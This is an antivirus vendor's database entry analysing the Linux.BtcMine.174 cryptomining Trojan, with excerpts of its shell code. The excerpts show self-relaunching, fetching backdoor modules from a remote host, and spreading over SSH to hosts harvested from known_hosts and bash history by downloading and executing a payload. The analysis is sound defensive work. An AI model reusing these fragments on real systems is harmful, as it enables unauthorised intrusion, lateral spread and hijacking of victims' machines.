Protégez votre univers

Nos autres ressources

  • — utilitaires gratuits, plugins, widgets
  • — service Internet pour les prestataires de services Dr.Web AV-Desk
  • — l'utilitaire de désinfection réseau Dr.Web CureNet!

Ma bibliothèque

+ Ajouter à la bibliothèque

Contacter-nous !

Nous téléphoner

0 825 300 230


Vos requêtes

  • Toutes : -
  • Non clôturées : -
  • Dernière : le -

Nous téléphoner

0 825 300 230



Added to Dr.Web virus database:2018-11-14
Virus description was added:2018-11-22


  • 9ae9233c79390495e607059870671c9936c413c5
  • b59fc07afc9f159562f71b3a21c38b1d471acc2f

A multicomponent malware program capable of infecting Linux devices and intended to be used for Monero (XMR) mining. It is implemented as a shell script containing over 1,000 lines of code.

When launched, it checks whether the server, from which the Trojan will subsequently download additional modules, is available:

function GetDownloadPath()
    paths=("/usr/bin" "/bin" "/lib" "/boot" "/tmp" "/home/`whoami`" "`pwd`")
    for path in ${paths[@]}
        if [ -x $path ] && [ -r $path ] && [ -w $path ]

If the script is not run with /sbin/init, the following actions are performed:

  1. The script is moved to a previously selected folder with write permissions (rwx) that is named diskmanagerd (the name is specified in the $WatchDogName variable).
  2. The script tries to restart using nohup or just in the background if nohup is not installed (in this case, the Trojan installs the coreutils package).
function Nohup()
    if [ "$arg" != "/sbin/init" ]
        rm -f $DownloadPath$WatchDogName >/dev/null 2>&1
        cp -rf $0 $DownloadPath$WatchDogName
        chmod 755 $DownloadPath$WatchDogName >/dev/null 2>&1
        rm -f $0
        nohup --help >/dev/null 2>&1
        if [ $? -eq 0 ]
            nohup $DownloadPath$WatchDogName "/sbin/init"> $DownloadPath.templog 2>&1 &
            if [ `id -u` -eq "0" ]
                yum install coreutils -y  >/dev/null 2>&1
                apt-get install coreutils -y  >/dev/null 2>&1
                sleep 30
            (exec $DownloadPath$WatchDogName "/sbin/init" &> /dev/null &)

Then the Trojan downloads and runs a version of the Linux.BackDoor.Gates.9 Trojan. This family of backdoors allows commands issued by cybercriminals to be executed and DDoS attacks to be carried out:

function oh_cause_she_is_dead()
    md5sum --help >/dev/null 2>&1
    if [ "$?" = "0" ]
        if [ `id -u` -eq "0" ]
            DownloadFile "md5" "$mdfive_root" "http://$remote_host/syn" "$DownloadPath$DownloadFileName"
            DownloadFile "md5" "$mdfive_user" "http://$remote_host/udp" "$DownloadPath$DownloadFileName"
        if [ `id -u` -eq "0" ]
            DownloadFile "size" "$DownloadFileSize" "http://$remote_host/syn" "$DownloadPath$DownloadFileName"
            DownloadFile "size" "$DownloadFileSize" "http://$remote_host/udp" "$DownloadPath$DownloadFileName"
    chmod 755 "$DownloadPath$DownloadFileName"

After that, the malware program searches for other miners and removes them when it detects them. For this, it scans /proc/${pid}/exe and /proc/${pid}/cmdline to check for specific lines (cryptonight, stratum+tcp, etc.).

If Linux.BtcMine.174 was not launched as root, it downloads and runs another shell script (SHA1: 9ae9233c79390495e607059870671c9936c413c5) from the attackers’ server, which, in turn, downloads and runs a number of exploits to escalate the privileges of Linux.Exploit.CVE-2016-5195 (DirtyCow) and Linux.Exploit.CVE-2013-2094 in the system.

In the next step, the script checks to see whether it is running as root. If it is, it stops services, removes their files using package managers, and empties the directories. The names of the following services are listed in the script: safedog, aegis, yunsuo, clamd, avast, avgd, cmdavd, cmdmgd, drweb-configd, drweb-spider-kmod, esets, xmirrord.

Then the Trojan adds itself to the Autorun list, using /etc/rc.local, /etc/rc.d/..., /etc/cron.hourly. After that, it downloads and launches a rootkit, also executed as a shell script. Among the rootkit module’s notable features is the ability to steal user-entered passwords for the su command and to hide files in the file system, network connections, and running processes.

After that, the Trojan runs a feature that collects data from various sources about all the hosts to which the current user has previously connected via SSH. The Trojan tries to connect to these hosts and infect them:

cat /root/.ssh/known_hosts|grep -v ,|awk '{print $1}' > /tmp/.h
cat /root/.ssh/known_hosts|grep ,|awk -F, '{print $1}' >> /tmp/.h
cat /root/.ssh/known_hosts|grep ,|awk -F, '{print $1}' >> /tmp/.h
cat /root/.bash_history|grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}'|sort -u >> /tmp/.h
cat /home/*/.bash_history|grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}'|sort -u >> /tmp/.h
cat /home/*/.bash_history |grep ssh|awk '{print $2}'|grep -v '-'|grep -v / |sort -u >> /tmp/.h
cat /home/*/.bash_history |grep ssh|awk '{print $3}'|grep -v '-'|grep -v / |sort -u >> /tmp/.h
cat /root/.bash_history |grep ssh|awk '{print $2}'|grep -v '-'|grep -v /|sort -u >> /tmp/.h
cat /root/.bash_history |grep ssh|awk '{print $3}'|grep -v '-'|grep -v /|sort -u >> /tmp/.h
cat /tmp/.h|grep -v|grep -v localhost|sort -u > /tmp/.hh
cat /tmp/.hh > /tmp/.h
rm -rf /tmp/.hh
for i in `cat /tmp/.h`
        exec ssh -oStrictHostKeyChecking=no -oCheckHostIP=no `whoami`@$i "wget -c -O /tmp/ ;curl -o /tmp/ ;python -c \"import urllib;urllib.urlretrieve(\\\"\\\", \\\"/tmp/\\\")\";php -r '\$f=fopen(\"'/tmp/'\",\"w\");fwrite(\$f, implode(\"\",@file(\"''\")));fclose(\$f);';ruby -e \"require 'open-uri';'/tmp/', 'w') {|f| f.write(open('') {|f1|})}\";perl -MNet::FTP -e \"\\\$ftp = Net::FTP->new(\\\"\\\");\\\$ftp->login('', '');\\\$ftp->binary;\\\$ftp->get(\\\"\\\",\\\"/tmp/\\\")\";chmod 755 /tmp/;(exec /tmp/ &> /dev/null &)" &> /dev/null &

Next, the Trojan launches and maintains a Monero (XMR) miner. In an infinite loop, the script checks for updates on a remote server so that it can download and install them if they become available. To do that, it carries out the following actions:

  1. The current script version number is stored to the $shell_ver variable.
  2. The file http://${remote_host}:${remote_port}/shell_ver.txt is downloaded.
  3. The obtained version is checked against the current one. If they match, nothing happens; if they do not match, the Trojan downloads the new script version from the management server.

News about the Trojan

Recommandations pour le traitement


Veuillez lancer le scan complet de toutes les partitions du disque à l'aide de Dr.Web Antivirus pour Linux.

Version démo gratuite

Pour 1 mois (sans enregistrement) ou 3 mois (avec enregistrement et remise pour le renouvellement)

Télécharger Dr.Web

Par le numéro de série

Editeur russe des solutions antivirus Dr.Web

Expérience dans le développement depuis 1992

Les internautes dans plus de 200 pays utilisent Dr.Web

L'antivirus est fourni en tant que service depuis 2007

Support 24/24

© Doctor Web
2003 — 2019

Doctor Web - éditeur russe des solutions antivirus Dr.Web. Doctor Web développe les produits Dr.Web depuis 1992.

333b, Avenue de Colmar, 67100 Strasbourg